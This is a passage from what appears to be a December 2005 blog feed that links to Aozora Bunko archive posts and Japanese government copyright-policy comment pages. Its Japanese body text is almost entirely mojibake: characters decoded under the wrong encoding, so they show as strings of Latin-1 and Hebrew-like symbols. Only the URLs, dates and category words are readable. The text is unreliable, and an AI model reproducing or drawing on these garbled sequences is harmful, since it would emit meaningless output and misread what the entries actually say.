    1937¡¾¼ֲֿ12¡ַֻ¯

    - -

    1938¡¾¼ֲֿ13¡ַֻ¯

    - -

    1939¡¾¼ֲֿ14¡ַֻ¯
    -¡¡¡ײו¹ָ¿·ֱנ¡׳¡ײ°ה¹ֶ¡׳
    -

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-31T01:15:18+09:00 -
    - -ֳ־ֵ×÷ג»÷´נֻֻ¡₪־»¹װ¾ץ¶·₪ֲֻ׀₪¹₪כ°ױ¸«ח½¸ -http://www.siesta.co.jp/aozora/archives/002450.html - -¡ײֳ־ֵ×÷ג»÷´נֻֻ¡₪־»¹װ¾ץ¶·₪ֲֻ׀₪¹₪כ°ױ¸«ח½¸¡׳₪¬¹װ₪ן₪ל₪ֶ₪₪₪כ₪ט₪¦₪ַ₪¹¡£

    - -

    http://www.kantei.go.jp/jp/singi/titeki2/pc/051216comment.html

    - -

    £²£°£°£¶ַ¯£±·מ£¶ֶ¡¶ג¡ֻ¸ב¸ו£µ»‏₪¬ִש₪בְ₪ך₪ַ₪¹¡£¥³¥ב¥ף¥ָ₪ֿ°²¼₪־¥ױ¥©¡¼¥א₪«₪י¡¢

    - -

    http://www.kantei.go.jp/jp/singi/titeki2/pc/comment2_f.html

    - -

    ₪₪₪µ₪¡¢₪ֹ₪¦₪¾¥³¥ב¥ף¥ָ₪ע´ף₪»₪ֶ₪¯₪ְ₪µ₪₪¡£

    ]]> -¡¡¶סֲ־ֵ×₪ֻ´״·¸₪־₪¢₪כ₪½₪¦₪²ױ½ך₪ע°תֽׁ₪·₪ֶ₪₪כ¡£ֳ־ֵ×÷ג»÷¿ה¿·׳²ט£²£°£°£µ¡£²£°£°£µַ¯£¶·מ¡ֻ¡http://www.kantei.go.jp/jp/singi/titeki2/kettei/050610.html¡ֻ₪«₪י₪־°תֽׁ₪ַ₪¢₪כ¡£

    - -

    ¡ײ¥³¥ף¥ֶ¥ף¥ִ¥׃¥¸¥ֽ¥¹₪עָפּצֵ×₪ֻ³ֲָח₪¹₪כ¡׳₪«₪י
    -¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼
    -£´¡¥ ¥³¥ף¥ֶ¥ף¥ִ־®ֲִּח¹ס₪ֻ¸‏₪±₪¿²‏³׳₪ע¿₪ב₪כ
    -¡£³¡ֻ ֻ¡ְ©ֵ₪־²‏³׳₪ע¿₪ב₪כ
    -¡¡±ַ²ט₪־ֳר÷מ×₪ֻ₪ִ₪₪₪ֶ₪ֿ¡¢₪½₪־¸מ´´ײ₪¬¡ײ¸רֹ½¸ו£µ£°ַ¯¡׳₪«₪י¡ײ¸רֹ½¸ו£·£°ַ¯¡׳₪ֻ±הִ¹₪µ₪ל₪¿₪¬¡¢±ַ²ט°³°₪־ֳר÷מ×₪ֻ·¸₪כ¸מ´´ײ₪־÷₪ך‎₪ֻ₪ִ₪₪₪ֶ₪ג¡¢ֳר÷מ×ֱ´ֲ־₪עִּ₪¸₪ֶ₪־¸מ´´ײ₪־¥׀¥י¥ף¥¹₪ַֻ־¸₪·₪₪¬₪י¸¡ֶ₪₪ע¹װ₪₪¡¢ £²£°£°£·ַ¯ֵ₪₪ַ₪ֻ·כְֿ₪עְֶ₪כ¡£¡¸ֹפ²³״¾¡ֻ
    -¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼
    -£²£°£°£·ַ¯ֵ₪₪ַ¡¢₪ָ₪₪₪¦₪³₪ָ₪ֿ¡¢£²£°£°£·ַ¯£´·מ₪₪ַ¡¢₪ָ₪₪₪¦₪³₪ָ₪ַ₪¹₪ֽ¡£
    -¡¡₪₪¿¡¢ֶ±₪¸₪¯¡ײ¥³¥ף¥ֶ¥ף¥ִ¥׃¥¸¥ֽ¥¹₪עָפּצֵ×₪ֻ³ֲָח₪¹₪כ¡׳₪«₪י
    -¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼
    -£´¡¥ ¥³¥ף¥ֶ¥ף¥ִ־®ֲִּח¹ס₪ֻ¸‏₪±₪¿²‏³׳₪ע¿₪ב₪כ
    -¡£³¡ֻ ֻ¡ְ©ֵ₪־²‏³׳₪ע¿₪ב₪כ
    -¡¡6) ¸¢ֽר¼װ₪־ֽר±׳₪ָ¸ר¶¦₪־ֽר±׳₪ָ₪־¥׀¥י¥ף¥¹₪ֻ־±°ױ₪¹₪כ
    -¡¡¥³¥ף¥ֶ¥ף¥ִ₪־¸מ₪ע¶¯²½₪¹₪כ°ל‎₪ַ¡¢¸¢ֽר¼װ₪־ֽר±׳₪ָ¸ר¶¦₪־ֽר±׳₪ָ₪־¥׀¥י¥ף¥¹₪ֻ־±°ױ₪¹₪כ₪³₪ָ₪¬ֹ¬ֽ׳₪ַ₪¢₪ך¡¢¼ׂ²סֵ×₪ֹֻ¬ֽ׳₪ָ¹ֽ₪¨₪י₪ל₪כ¸רְµ₪ֽרֽׁ₪עֲ¥¿₪¹₪כ´ְֵׁ₪«₪י¡¢ֳר÷מ¸¢ֻ¡₪־¡ײ¸¢ֽרְ©¸ֲµ¬ִך¡׳₪־ֵ¬ֵצ₪¬ּמ₪ֻ₪×₪±₪כ³ֲָחֵש₪ֻ₪ִ₪₪₪ֶ¸¡ֶ₪₪ע¹װ₪₪¡¢£²£°£°£µַ¯ֳז₪ֻ·כְֿ₪עְֶ₪כ¡£¡¸ֹפ²³״¾¡ֻ
    -¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼¡¼
    -₪ג₪¦·כְֿ₪¬½׀₪ֶ₪₪₪כ₪ֿ₪÷₪ַ₪¹₪¬¡¢¸½¹װ₪־ֳר÷מ¸¢ֻ¡₪־ְ÷¿ְ₪ע°»‎₪¹₪כ₪ְ₪±₪ַ₪ג½½¬₪ְ₪ָ»׳₪¦₪־₪ַ₪¹₪±₪ֹ₪ֽ¡£

    - -

    ¡¡₪₪₪ם₪₪₪ם₪ָ¥ִ¥ֳ¥³¥₪ֹ₪³₪ם₪ֿ₪¢₪כ₪«₪ָ»׳₪₪₪₪¹₪¬¡¢₪₪₪µ₪ף₪־₪´°ױ¸«₪ע·ֱ₪ֻ₪·₪ֶ₪₪ֶ²¼₪µ₪₪¡£
    -

    ]]> -
    -society -ּחִֵֽµ»ײ -2005-12-26T09:02:22+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£¶·מ¹ז -http://www.siesta.co.jp/aozora/archives/002446.html - -£²£°£°£µַ¯£¶·מ₪ֿ¡¢£µ£³÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¥ֻ¥ו¡¼¥¹₪ֳֶֿ₪ֻ₪₪·¡£
    -

    ]]> -¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£¶·מ₪ֻ₪ֿ¡¢£µ£³÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£₪₪ס¢÷מֹּ₪¸ר³«₪־₪¿₪בµ¡ַ½₪·₪₪₪¥ך¥ף¥¯₪¬°לֹפ₪¢₪כ¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ¶ֿ÷¹₪ַ³₪ּמ½½»°₪ַ¡¢£¸÷מֹ¡ֹג₪«₪ײָפ¹װֵח¡¢´ײִµ÷ֲ»צ·ן¡¢¿ֲֽ₪¿ֽ´ײְן¼ײ₪־µ¡ּ©¡¢ֵֶָֻ¾ו־¦÷מְן¡¢₪־₪ם₪־₪םֻ₪ֳֶ₪־¶ֳ°¡¢÷£ְ־₪׀₪₪·ת¹ח¼ֳִ¡¢ְן»‏־¹¹װ³ף¡¢ֶַ´₪»ָ¯ְּ´±¡ֻ₪¬¸ר³«₪µ₪ל₪¿¡£¡ײ¿ֲֽ₪¿ֽ´ײְן¼ײ₪־µ¡ּ©¡׳¡¢¡ײֵֶָֻ¾ו־¦÷מְן¡׳¡¢¡ײ₪־₪ם₪־₪םֻ₪ֳֶ₪־¶ֳ°¡׳¡¢¡ײ÷£ְ־₪׀₪₪·ת¹ח¼ֳִ¡׳¡¢¡ײְן»‏־¹¹װ³ף¡׳¡¢¡ײֶַ´₪»ָ¯ְּ´±¡׳₪ֿ¡¢¿·¼´ןָ¯ְּ²¦¡¢¶גַמ»־₪¬ֵ׀¾ל₪¹₪כ°לֿ¢₪־¥·¥ך¡¼¥÷₪ַ₪¢₪כ¡£»ִ₪ך£µ׃₪ג¹»ְµ₪¬¿₪ף₪ַ₪₪₪כ¡£¡ײֹג₪«₪ײָפ¹װֵח¡׳₪ֻ₪ֿ₪ֱ₪ח₪ֳ₪ָ»׳½׀₪¬₪¢₪כ¡£¡ײְ¸₪­₪ֶ₪₪₪כִ²¡׳₪ַ³₪ּמ½½»°₪עֳ־₪ֳ₪ֶ¡¢ֱבְמ¸¸ֻJA₪־ֳ»װ½¸¡ײ½½ָ¬»‏₪־²»³ֽב¡׳₪עֶֹ₪ף₪ַ¡¢¡ײ₪³₪ף₪÷מ²ָ₪¬₪₪₪¿₪־₪«¡׳₪ָ¶ֳ₪₪₪ֶ₪₪₪¿¡£¿ן¬ְ־₪־₪³₪ָ₪₪ְ₪±₪ל₪ֹ¡¢ֳ»װ₪׀₪«₪ך₪ַ₪ֿ×ֲ­₪ך₪₪₪₪¾₪ָ»׳₪ֳ₪ֶ₪₪₪¿¡£¡₪₪ְ¡¢¡ײ³₪ּמ½½»°ֱ´½¸¡׳₪ֿ´©¹װ₪µ₪ל₪ֶ₪₪₪₪«₪ֳ₪¿¡ֻ₪½₪ף₪»‏¡¢¹ײֳּ¼ׂ¡¦¾¯ַ¯¶ז³ֹפ¸¸ֻ₪־¡ײֹג₪«₪ײָפ¹װֵח¡׳₪ע¸ֵ½סֵ¹₪ַ¸«₪ִ₪±₪¿¡£ֳזװ₪¯₪י₪₪₪־ִ¹₪µ₪ְ₪±₪ל₪ֹ¡¢ֶֹ₪±‏₪¨₪¬₪¢₪ֳ₪ֲֶחׁ₪ַֻּּע₪«₪ֳ₪¿¡£ְִ¶ץ¸¸ֻ₪עֳ־₪ֳ₪¿»‏₪ֻ¡¢²¬ֻו÷ֶ²₪ָ³₪ּמ½½»°₪־ּ¾ֱ°₪ע¸«₪ִ₪±₪ֶ¡¢ֲחׁ₪ֻ₪¦₪ל₪·₪«₪ֳ₪¿µ­²±₪¬₪¢₪כ¡£¡ײֹג₪«₪ײָפ¹װֵח¡׳₪ֿ¾¯₪··³»צ¿§₪¬¶¯₪₪₪±₪ל₪ֹ¡¢₪ִ₪₪₪ִ₪₪ֶֹ₪ף₪ַ₪·₪₪¦ַּּע₪µ₪¬₪¢₪כ¡£°לֵ¡¢ֱַ₪₪₪ֶ₪₪ֶֽ₪·₪₪¡£

    - -

    ¡¡־׃ֹחָ‏»ׂ₪ֿ¡¢£·÷מֹ¡µµ₪µ₪ף¡¢ז₪־ֲח־¹¹װ¡¢ָ‏₪·₪₪¸₪¡¢¸ׁ׸ל¡¢ִ«¸זָ׃¡¢₪×₪ֻ₪×₪ף¶ז³ֹפ¡¢¥¯¥י¥י¡ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡¹ס»»ֻֿ÷₪ֿ¡¢£µ÷מֹ¡½½ֶף¿ְ³­½½ֿ÷¼ךֱֳֿ¡¢µֶ»ֳזֱֱִֵ¡¢µ÷÷מ¼װ¡¢µ״ֶ₪»׀ֻו³¡¢¶ה»°½½ֻח¡ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£ֿ¢÷מִ¹װ₪ָ¸ְ₪ֳ₪¿‎₪¬₪ט₪₪¡ײ½½ֶף¿ְ³­½½ֿ÷¼ךֱֳֿ¡׳₪¬₪ה₪ֿ₪ך₪ט₪₪¡£¼ח¿ֽ¸ר¡¢½½ֶף¿ְ¡¥×¥ֱ¥ױ¥כ¥₪¡ֻ³­½½ֿ÷₪־¥­¥ד¥י¥¯¥¿¡¼ֲ₪·ֱ₪ג₪ט₪₪₪־₪ְ₪±₪ֹ¡¢₪½₪ל°¾ו₪ֻ¡¢₪ג₪¦°ל¿ֽ₪־¥ב¥₪¥ף¥­¥ד¥י¥¯¥¿¡¼¡¢´־׃ֽֽ₪³₪ָ¾¾¿ֵ¼¡ֿ÷₪ָ₪־³₪±¹ח₪₪₪ָ₪₪₪¦₪«¡¢´״·¸₪¬ֶֹ₪ף₪ַ₪₪₪ֶµ₪»‎₪ֱ₪¬₪ט₪₪₪־₪ַ₪¢₪כ¡£¡ײ¶ה»°½½ֻח¡׳₪ֿ¡¢¹ס»»ֻֿ÷₪ֻ₪ֱִֿ₪·₪₪¸½ֲו₪ג₪־¡£¡״¹ס»»ֻֿ÷ֳµִו¾®ְגֱ´½¸¡¡÷מֹ¼ׂ¡ֻ₪ָ₪₪₪¦ֻ₪¬½׀ַָ₪µ₪ל₪¿₪־₪ַ¡¢₪³₪־ֻ₪«₪י¡¢₪µ₪י₪ֻ₪₪₪ם₪₪₪ם₪¸½ֲו₪ג₪־₪¬ֶ‏־ֿ₪ַ₪­₪כ¡£

    - -

    ¡¡»ִֵֶֹׂ§¡¢ֲֻּ¼ֶ©ֳ«¡¢₪ָ₪ג₪ֻ£µ÷מֹ₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£»ִֵֶֹׂ§₪ֿ¡¢¡ײµ±ל»ֽ½½ַ¯¡׳¡ײ¸¦µזֵ×ֲײֵ₪־ְֽ®¡׳¡ײ¸ְ¸ל₪ֶָ»¶ס¡׳¡ײ¹©³״ַמ»־ֻצ¹­¶³ֶף·¯¡׳¡ײ¹ג¸¶¡׳¡¢ֲֻּ¼ֶ©ֳ«₪ֿ¡¢¡ײֱֳַ¡¹¡£±¡ֻ¡׳¡ײֱֳַ¡¹¡£²¡ֻ¡׳¡ײֹײײ₪־»ם¿ְ₪ע»׳₪ױ¡׳¡ײּ¡¸ְ°לֲ§¡׳¡ײ²זֿ´¹צ¡׳₪ַ₪¢₪כ¡£

    - -

    ¡¡ֻּץ₪ֿ£´÷מֹ¡¥¢¥ף¥ַ¥כ¥»¥ף¡ײְײ₪₪₪¯₪ִ¡׳¡¢¥ַ¥£¥±¥ף¥÷¡ײֶףֵװ׸ל 01 ¾ו´¬¡׳¡¢¥׀¡¼¥ֽ¥ֳ¥ָ¡ײ¾®¸ר½ק¡׳¡¢ֿ¥¿׳¡ײ¹¦²µ¸¡׳¡ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¡ײ¾®¸ר½ק¡׳₪ָ₪₪₪¦÷מֹ₪ֿ¡¢ֻּץ¡¢±ַ²ט¡¢¥¢¥ֻ¥ב₪₪ֹ¾ׂ²נ₪־µ¡²ס₪¬ֲ¿₪₪¡£₪·₪«₪·¡¢₪½₪ל₪¾₪ל₪־ֲַ־₪ַ¡ײ²ע¼ב¡׳₪ָ₪ַ₪ג₪₪₪¦₪₪­₪ג₪־₪¬¡¢₪₪₪ם₪₪₪ם₪ָ²ֳ₪ן₪ֳ₪ֶ₪₪₪כ₪־₪ַ¡¢·כ¹½₪½₪־°ץ¾₪¬ׁ₪ן₪כ¡£¶סֲ־ֵ×₪ֻ₪ֿ¡¢£±£¹£¸£µַ¯₪־ֶֻ₪־¥¢¥ֻ¥ב¡¼¥·¥ח¥ף₪ָ¥¢¥ב¥ך¥«₪ְַ½÷מ₪µ₪ל₪¿±ַ²ט¡₪ֹ₪ֱ₪י₪גDVD₪¢₪ך¡ֻ₪עָז₪₪ֶ₪₪כ₪ט₪¯₪ן₪«₪כ¡£¼ֲ₪ֿ¡¢¼ח¿ֽ¸ר₪־¥­¥ד¥י¥¯¥¿¡¼₪½₪־₪ג₪־₪ֻ₪₪ַ°ד₪₪₪¬½׀₪ֶֽט₪כ¡£÷£²ף¸ר³«₪־µֳֶ׃´²ּץ₪ָ¡¢¥°¡¼¥ֶ¥ף¥¥כ¥°¥׳¥ם¥¸¥§¥¯¥ָ₪ַ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¸¶¸₪עֶֹ₪ָז₪₪ֶ₪₪כ₪ָ¡¢₪ן₪«₪כ₪ָ»׳₪¦¡₪½₪־₪¦₪ֱ¡¢₪³₪־blog₪ֻ₪₪ָ₪ב₪ֶ½ס₪₪₪ֶ₪₪¿₪₪¡ֻ¡£

    - -

    ¡¡ְ¸‎¿®ֹ׳₪־¡ײ»א¼װ₪־½ס ¡½¡½½י¹ֶַָ¡½¡½¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¡ײ»א¼װ₪־½ס¡׳₪ֿ₪³₪ל₪ַ¡¢ֵװ¹ח£³₪ִ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿₪³₪ָ₪ֻ₪₪כ¡£¾¼ֲֿ¸³״ֱ´½¸ִלֻ₪־¡ײ¿·»ת¿·²¾ּ¾¡׳¡¢³ְׁמ½סֵ¹₪־ֳ±¹װֻ¡״»א¼װ₪־½ס¡ִלֻ₪־¡ײµל»תµל²¾ּ¾¡׳¡¢₪½₪·₪ֶ¡¢½י½׀»¨»ןִלֻ₪«₪יµ¯₪³₪·₪¿₪³₪־¡ײ½י¹ֶַָ¡׳₪ַ₪¢₪כ¡£½י½׀»¨»ן₪«₪י¡¢ֳ±¹װֻ¡¢ֱ´½¸₪״₪ָ¼‎ֿ¿₪µ₪ל₪כ»‏₪ֻׁ₪ֳ₪ֶ₪₪₪ֳ₪¿°₪ךׁ₪ך₪עֳ־₪כ»צ₪¬½׀ֽט₪כ¡£

    - -

    ¡¡»ם½¸₪¬£³׃¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£ֵח÷ךֶ£ֲ¼₪־¡ײ¼ד÷½¸¡׳₪ָ°ֵֻלְֵֽ÷₪־¡ײ»ם½¸²ֶ²ײ¡׳¡ײ₪ן₪¬₪ׂ₪ָ₪ֻֽ¿₪ױ₪כ°¥²־¡׳₪ַ₪¢₪כ¡£

    - -

    ¡¡ֲ¾₪ֻ₪ֿµֲפ¸­¼£₪¬£³÷מֹ¡¥«¥₪¥םֳִִ¹¡¢»ח÷°ְק₪ֻ₪ִ₪₪₪ֶ¡¢¥ִ¥§₪ֽ₪÷₪¡ֻ¡¢ְµ²¬»ׂµ¬₪¬£²÷מֹ¡ֻֽױ½¸´¬½½ֿ»¡¢ֻֽױ½¸₪עֶֹ₪א¡ֻ¡¢־׃ֹװֻ÷₪¬£²÷מֹ¡₪¢₪־´י¡¢¿ַֿ₪ָעפ¡ֻ¡¢ֲִֵ¼¿®ֹ׳₪¬£±÷מֹ¡ֱֶ¬²ײ¡ֻ¡¢ִֵֵ°ֲֹ¼₪¬£±÷מֹ¡₪¢₪·₪׃₪־²ײ¡ֻ¡¢ֵח÷ךֶ£ֲ¼₪¬£±÷מֹ¡°ֶֻ¦₪־־¹¡ֻ¡¢ֶמֹפ½₪ְֲֿ÷₪¬£±÷מֹ¡¸½ֲו÷מ²ָ₪ֲֻ׀₪¹₪כָדָ½₪ָֽ׳µב¡ֻ¡¢²£¸קֽר°ל₪¬£±÷מֹ¡ּµ¾ן₪־ֹק¡ֻ¡¢¹ג»³ֳפµם₪¬£±÷מֹ¡°לֽױ½ק»ֻ₪־¡ײ₪¿₪±₪¯₪י₪¡׳₪עֶֹ₪₪ֶ¡ֻ¡¢¼ִֵֶ־®ְ±₪¬£±÷מֹ¡»ִ₪µ₪ל₪¿₪כ¹¾¸ֽ¡ֻ¡¢ּ´ּמµ׳÷מ₪¬£±÷מֹ¡½ק¹£¼ח¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-19T08:19:04+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£··מ¹ז -http://www.siesta.co.jp/aozora/archives/002445.html - -£²£°£°£µַ¯£··מ₪ֿ¡¢£µ£·÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¥ֻ¥ו¡¼¥¹₪ָ₪·₪ֶ₪ֿ¡¢¸ם¿¢ֿ¢ֽם₪־₪¿₪ב₪־·ַ¼¨ִָ¡ײ₪א₪·₪ָ₪ך₪¢₪¡׳₪־ִ÷¿₪ְ₪ם₪¦₪«¡£

    ]]> -¡¼ח₪¥ֻ¥ו¡¼¥¹¡
    -¸ם¿¢ֿ¢ֽםֽׁ₪־·ַ¼¨ִָ¡ײ₪א₪·₪ָ₪ך₪¢₪¡׳₪¬ִ÷¿₪µ₪ל₪¿¡£¸½÷₪ג¡¢¥ב¡¼¥ך¥ף¥°¥ך¥¹¥ָ₪ַ¡¢±¿±ִ₪־‎¼°ֵש₪ֻ₪ִ₪₪₪ֶ₪־ֳֿ₪·¹ח₪₪₪¬¿₪ב₪י₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£··מ₪ֻ₪ֿ¡¢£µ£·÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£₪₪ס¢÷מֹּ₪¸ר³«₪־₪¿₪בµ¡ַ½₪·₪₪₪¥ך¥ף¥¯₪¬°לֹפ₪¢₪כ¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ³₪ּמ½½»°₪ַ¡¢£±£µ÷מֹ¡ֱֳַ״´י¡¢³ֱ¿§₪־»זֹקֱ¥¡¢µ¿ּה₪־¶ג²פ¡¢¥´¡¼¥כ¥ַ¥ף¡¦¥׀¥ֳ¥ָ»צ·ן¡¢ך₪ֳֻ¡¢ך₪¡¢א¨ֳמ´»צ·ן¡¢ּכµד₪­ֵ´¹¡¢²³״₪¬חֱ₪ע¶₪²₪¿ֳֿ¡¢»°½ֳֵטײ₪ך₪־µ­¡¢¡״½½ָ¬»‏₪־²»³ֽב¡₪־÷מ¼װ₪־¸ְֽױ¡¢¿ֲֽ₪׸ל¡¢¿ֲֽ־²עֻ¶₪ע´ַ₪כ₪־µ­¡¢ְ®ֱ״·קָפ¹װ₪ָ»ה₪־¥ב¥ג¡¢¡״ֳֿµוֵנֶס¡₪־÷מ¼װ₪־¸ְֽױ¡ֻ¡£¾®ְג₪¬ָ¾¬¡¢¿ןֹ®¡¦ֹ¾ְֿ₪¬ָ¾¬₪ַ₪¢₪כ¡£

    - -

    ¡¡¼¡₪ֲֻ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ¡¢½יֲו¹ס²ס¿½ס´´ִ¹¡¢ֳז°זְµ°ל₪ַ¡¢£¹÷מֹ¡¹ס־©¹ס²ס¿½ס´₪ֻ₪ִ₪₪₪ֶ¡¢¿½ס´ֻ¡³²°ֳֿ¡¢¿½ס´ֻ¡₪־ְ®־©¡¢¡ײ²½ס»‏ֲו¡׳₪־½׀¸½¡¢ְ¸₪₪לׁ₪ֳ₪¿ְײ÷ה־¥µ¡¢ֳ־¼±₪ְָ¯¼£₪ָ₪־ֽ·־¥¡¢ֳֿ‎¸²½±¿ֶ°ף¹נ¡¢ּמ₪ֻ»³₪ֻ₪«₪«₪כֶת₪־¶¶¡¢ּ±ֲ²₪־·ל´ֹ¡ֻ₪ַ₪¢₪כ¡£¡ײ¡ײ²½ס»‏ֲו¡׳₪־½׀¸½¡׳₪ֻ₪ֿ¡¢µ₪₪ֻ₪₪כ°לְב₪¬₪¢₪ֳ₪¿¡£°²¼₪ֻ°תֽׁ₪·₪ֶ₪×₪¯¡£
    -¡ײ¡¡°לגֲא₪₪₪ֶ¿½ס´³¦₪ע¾₪₪כ₪ָ¡¢₪³₪־°ל¶ש₪־ְ₪³¦₪ג₪₪¿¡¢²׀±ך₪־ֳז₪ֻ₪¢₪כ₪־₪ַ₪¢₪כ¡£₪₪₪¡¢¡״·²½ס־א½¾¡₪ע¸ֵֻ₪ָ₪·₪ֶַה₪ל₪׀¡¢ֻ₪ָ₪·₪ֶ₪ט₪ך₪ג¡¢»ז₪ָ₪·₪ֶַה₪כ‎₪¬ֳֽ₪¬₪ט₪₪₪ְָלּח²ָ₪ֿ₪₪₪ֳ₪ֶ₪₪₪כ¡£ֻ₪עֶֹ₪א¡¢³״₪עµב₪ב₪כ₪ג₪־₪ָ₪·₪ֶ₪־ֶֻּ±ֲ²₪־₪³₪³₪ם÷¬₪¬¡¢₪ג₪ֿ₪ה־ֹ½ס₪ע₪ט₪א־ֿ₪ע¼÷₪ֳ₪ֶ¡¢₪«₪«₪כ־ֹ½ס₪ע¡¢־²»ְ₪ַ₪ָ₪«₪·₪ֶ¡¢¥¨¥םֻ₪־÷א־ֱ₪ָ₪·₪ֶ₪·₪₪¦₪³₪ָ₪ע·׀÷ֵׁ×¹½ֲ₪₪ע₪ג₪ֳ₪ֶ₪ז₪כ₪¹₪ָ₪₪₪¦ֳ³¬₪ֻ־©»ך₪ֳ₪¿¡£ֶֻּ±ֲ²₪־¶µֽ₪־‎¸‏₪¬¡¢־ע»ֻ°ֽט½י₪ב₪ֶ₪־¡¢ֲח½°₪ֻ₪ט₪ֳ₪ֶ¡ײ²½ס»‏ֲו¡׳₪־½׀¸½₪ֻ¸‏₪ֳ₪¿₪ָ₪ג₪₪₪¨₪כ₪־₪ַ₪¢₪כ¡£»ֿ¹ִִכ₪ַ₪ג₪₪¯¡¢¥ׂ¥ֳ¥ָ¥י¡¼₪ַ₪ג₪₪¯¡¢ּ±ֲ²₪־¶µִֽד²¼₪¬¡¢ֲח½°¼«₪י₪־¸²½°ה»÷₪ע־²»ְ₪ַ¾ֶ₪¯₪ָ₪₪₪¦»‏ֲו₪עְ¸₪½׀₪·₪ֶ₪₪₪כ₪־₪ַ₪¢₪כ¡£־©ֻ¡ֵ×»ס־ֱ₪½₪־₪ג₪־₪¬¡¢ֻ¡₪־±¿ֽׁ₪־₪¢₪ה₪₪ך₪ֻ₪ט₪ֳ₪ֶֻ´₪׃₪ט₪¦₪ָ₪¹₪כֳ³¬₪ֻ¡¢÷£¡¢ֶֻּ±ֲ²₪ֿ־©»ך₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¢₪כ¡£¡׳¡ֳז°זְµ°ל¡ײ¡ײ²½ס»‏ֲו¡׳₪־½׀¸½¡׳₪ט₪ך¡ֻ

    - -

    ¡¡µ׳÷הֽױ»ׂ₪־÷מֹ₪¬£¶÷מֹ¡µ׳÷הֽױ»ׂ₪־ְֲֳ¸₪ָ»אֻ´¡¢ֶ‏ַ¡¢ֽמ₪ֱ₪ֶ₪ז₪¯ְ₪³¦¡¢³¥¿§₪־µ­²±¡¢´צֵּ₪«₪־÷ַ´¡¢²¡¹₪·₪­½ײ´ײ¡ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¿ְ¸ֽ₪ֻ½»₪ף₪ַ₪₪₪¿₪³₪ָ₪¬₪¢₪כ₪¬¡¢ֳֿ¸µ₪־÷מ²ָ₪ָ₪·₪ֶ¿½ס´₪ְֳֶֻ¥³¡¼¥¡¼₪¬₪¢₪ֳ₪¿¡£ֲ¾₪ֻ₪ג₪₪ְ÷מֹ₪¬₪¢₪כ₪־₪ְ₪ם₪¦₪«¡£

    - -

    ¡¡ֻּץ₪ֿ¡¢£¶׃¡¥¢¥¡¼¥ֱ¥¹¡ײל₪ע¿ׂ₪ֽ₪ֶ»°ְי־₪¡׳¡¢¥¢¥ף¥ַ¥כ¥»¥ף¡ײ¾®ּכ׃ִֶ»¡׳¡¢¥¸¥§¥ױ¥¡¡¼¥½¥ף¡ײ¥¢¥ב¥ך¥«ֶָ־©ְכ¸ְ¡׳¡¢¥ֹ¥₪¥כ¡ײ°ֵ¹זֹסֶ§¿ֽ₪־ֶז¡׳¡¢¥ג¡¼¥ׁ¥ֳ¥µ¥ף¡ײ½יְד¡׳¡¢¥ך¥«¡¼¥ֹ¥¦¡ײ·׀÷ׁ³״µ₪׃²ְַ₪־½פ¸¶ֽ‎¡׳¡ֻ¸ר³«₪µ₪ל₪¿¡£¥¸¥§¥ױ¥¡¡¼¥½¥ף¡ײ¥¢¥ב¥ך¥«ֶָ־©ְכ¸ְ¡׳₪ֿ¡¢¡ֲפֽ¡µָ₪ֻ₪ט₪כֻּץ₪ַ₪¢₪כ¡£¥ֹ¥₪¥כ¡ײ°ֵ¹זֹסֶ§¿ֽ₪־ֶז¡׳₪־ֻּץ¼װ₪ֿ¡¢»°¾ו±קֵׁµָ¡ִ¹ֳ«ְמ»‏±«₪־ֶג±ן₪־ֹ׳¡ֻ₪ַ₪¢₪כ¡£

    - -

